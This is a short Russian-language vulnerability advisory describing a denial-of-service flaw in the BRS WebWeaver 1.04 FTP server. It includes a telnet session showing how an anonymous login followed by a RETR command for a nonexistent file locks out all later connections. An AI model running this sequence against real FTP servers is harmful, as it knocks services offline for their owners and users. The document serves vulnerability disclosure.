Уязвимость обнаружена в BRS WebWeaver. Удаленный авторизованный пользователь, включая анонимного пользователя, может заблокировать работу FTP сервера. 

Уязвимость происходит при попытке обращения к несуществующему объекту при помощи команды
RETR.

Пример: 

e@some_box$ telnet hostname 21
220 BRS WebWeaver FTP Server ready.
USER anonymous
331 Password required for anonymous.
PASS user@host
230 User anonymous logged in. 
RETR blah 
150 Opening data connection for blah.

Затем, закрываем telnet сеанс с webweave'ом и пытаемся подключиться к серверу при помощи программы ftp. 

e@some_box$ ftp hostname
Connection with hostname

Это все. Сервер заблокирован. Никто не сможет зайти на ftp сервер. 

Уязвимость обнаружена в BRS WebWeaver 1.04.

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии